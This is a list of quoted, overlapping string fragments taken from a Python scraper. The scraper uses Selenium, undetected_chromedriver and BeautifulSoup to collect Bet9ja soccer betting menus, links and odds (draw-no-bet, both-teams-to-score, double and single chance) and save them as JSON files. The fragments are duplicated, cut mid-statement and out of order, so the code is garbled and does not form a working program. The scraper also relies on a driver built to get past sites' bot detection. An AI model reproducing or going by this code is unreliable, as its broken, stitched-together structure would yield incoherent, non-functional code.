"= len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index",
"re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt',",
"= soup.select('.sports-table > .table-f') for each in elem: # Compile info = {}",
".accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id']",
"# Wait 5 seconds time.sleep(5) # Index of target index = -1 #",
"'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate DNB if index >",
"info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or",
"Functions # ============================================================================================================= # Bet9ja Menu def getMenu(): # Object data = {}",
"indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4) Browser.quit() # getMenu() #",
"'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info)",
"json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web prefix p",
"as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import",
"outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web prefix p =",
"each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip()",
"'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e",
"def getLinks_Bet9ja(): # web prefix p = bet9ja + 'competition/soccer/' # link Object",
"Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion",
"p + u + v + w # Gather links links[a['title']] = fl",
"in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div in upper:",
"w # Gather links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w')",
"+ ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home']",
"JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links",
"# Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1,",
"0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds,",
"full link fl = p + u + v + w # Gather",
"pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double",
"outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds = [] #",
"in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index",
"info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all(",
"vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or",
"= i break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() #",
"outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4) Browser.quit() # getMenu()",
"away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] =",
"BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions =",
"l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d",
"as EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time import",
"open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single",
"info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all(",
"Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script(",
"Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\")",
"as json_file: global data data = json.load(json_file) for e in data: for a",
"= re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON with",
"import re from pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode =",
"each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as",
"BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja",
"Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser",
"i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5)",
"> .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div in upper: title =",
"id # fetch Submenu and Menu link for each in data: l =",
"'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile,",
"import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from",
"= div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id",
"elem: # Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team =",
"each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 #",
"# Index of target index = -1 # Get index soup = BeautifulSoup(Browser.page_source,",
"each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip()",
"away_team info_2['match'] = home_team + ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip()",
"soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem:",
"============================================================================================================= # Bet9ja Menu def getMenu(): # Object data = {} # Initialise",
"# full link fl = p + u + v + w #",
"home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all(",
"json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4) Browser.quit() #",
"= uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser)",
"in data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') +",
"a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:] # full link fl",
"GGNG def GGNG(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt',",
"====================================================================================== # DNB def DNB(): # Odds odds = [] # fetch links",
"e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace(' ', '') +",
"time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f')",
"# web prefix p = bet9ja + 'competition/soccer/' # link Object links =",
"info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt',",
"actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions #",
"data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\")",
"Browser.quit() # GGNG def GGNG(): # Odds odds = [] # fetch links",
"'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile:",
"'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] =",
"Odds # ====================================================================================== # DNB def DNB(): # Odds odds = [] #",
"5 seconds time.sleep(5) # Index of target index = -1 # Get index",
"= \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def getMenu(): # Object",
"with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile:",
"from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import",
"open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file) for e in data:",
"Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") #",
"Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll the page height",
"outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4) Browser.quit()",
"> .table-f') for each in elem: # Compile info_1 = {} info_2 =",
"with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and",
"+ ' vs ' + away_team info_2['match'] = home_team + ' vs '",
"{} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate",
"upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location']",
"as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB",
"' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip()",
"'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w')",
"home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all(",
"for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break",
"for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup",
"height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc",
"fetch Submenu and Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID,",
"'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info)",
"with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file) for e in",
"'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs ' +",
"# ============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import",
"= each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w')",
"' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] =",
"break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5",
"# DNB def DNB(): # Odds odds = [] # fetch links with",
"= int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) #",
"= {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find(",
"'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1)",
"odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit()",
"Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global",
"Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG if index >",
"= bet9ja + 'competition/soccer/' # link Object links = {} # fetch menu",
"uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions",
"BeautifulSoup import time import json import re from pathlib import Path # Browser",
"i break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait",
"each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt',",
"\"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div",
"json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds = []",
"selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup",
"from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as",
"'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== #",
"or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile:",
"Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds odds",
"time.sleep(5) # Index of target index = -1 # Get index soup =",
"= each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li',",
"indent=4) Browser.quit() # Double Chance and Single Chance def DS_chance(): # Odds s_odds",
"Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem =",
"= each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0",
"# Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click()",
"'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait",
"\"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def getMenu(): # Object data",
"links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data",
"[] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global",
"BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: # Compile",
"Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4)",
"info_1['category'] = e info_2['category'] = e info_1['match'] = home_team + ' vs '",
"Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME,",
"{} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] =",
"= each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0",
"Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt',",
"i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break #",
"index = i break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click()",
"'side-nav-league__link') e = [] for t in d: f = {} f['title'] =",
"'') + '/' w = a['id'].lower()[1:] # full link fl = p +",
"and Single Chance def DS_chance(): # Odds s_odds = [] d_odds = []",
"with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds #",
"in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {}",
"height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup",
"or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile,",
"away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or",
"def GGNG(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r')",
"e in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) #",
"in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate",
"10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup",
"============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait",
"soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate DNB if index",
"'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload",
"0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4)",
"= data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d =",
"as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4)",
"e in data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '')",
"'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs ' + away_team",
"if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate DNB if",
"p = bet9ja + 'competition/soccer/' # link Object links = {} # fetch",
"in elem: # Compile info_1 = {} info_2 = {} home_team = each.find(",
"\"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu",
"+ v + w # Gather links links[a['title']] = fl # Save links",
"{});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\")",
"# Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds",
"in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse",
"# Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds odds =",
"= {} data[title]['location'] = id # fetch Submenu and Menu link for each",
".table-f') for each in elem: # Compile info_1 = {} info_2 = {}",
"BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t in d:",
"{});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"= home_team + ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] =",
"info['category'] = e info['match'] = home_team + ' vs ' + away_team info['time']",
"link fl = p + u + v + w # Gather links",
"info['match'] = home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG']",
"0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip()",
"info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip()",
"{} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data =",
"data = json.load(json_file) for e in data: for a in data[e]['submenu']: u =",
"= a['id'].lower()[1:] # full link fl = p + u + v +",
"open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ======================================================================================",
"outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB(): #",
"data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace('",
"[] for t in d: f = {} f['title'] = t['title'] f['id'] =",
"+ away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away']",
"height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i))",
"'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() ==",
"indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds = [] # fetch",
"HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each in",
"fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file) for",
"= soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f = {}",
"= each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team",
"l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e",
"e info_2['category'] = e info_1['match'] = home_team + ' vs ' + away_team",
"seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i",
"indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds",
"Index of target index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib')",
"# Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:",
"as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single Chance def",
"def DS_chance(): # Odds s_odds = [] d_odds = [] # fetch links",
"div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id #",
"away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] =",
"\"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info_1",
"# Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"= each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0",
"as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds",
"in elem: # Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team",
"each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup =",
"Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\"",
"Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for",
"upper = div.select(\".accordion-inner > .accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip()",
"fl = p + u + v + w # Gather links links[a['title']]",
"s_odds = [] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as",
"== 'GG/NG': index = i break # Activate GGNG if index > -1:",
"import By from bs4 import BeautifulSoup import time import json import re from",
"elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info =",
"links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links,",
"Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link')",
"'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team",
"fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit()",
"odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit()",
"# Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds",
"= div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu and",
"+ '/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:]",
"w = a['id'].lower()[1:] # full link fl = p + u + v",
"box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG':",
"'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds,",
"Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse",
"t in d: f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '',",
"t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as",
"vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or",
"# ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode)",
"+ 'competition/soccer/' # link Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt',",
"expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time",
"each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip()",
"in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',',",
"from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import",
"+ '/' w = a['id'].lower()[1:] # full link fl = p + u",
"= -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td'))",
"for e in data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ',",
"'r') as json_file: global data data = json.load(json_file) for e in data: #",
"5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table",
"# Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i",
"info_2['match'] = home_team + ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time']",
"uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions",
"> .table-f') for each in elem: # Compile info = {} home_team =",
"link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc",
"soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG if index",
"\"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch",
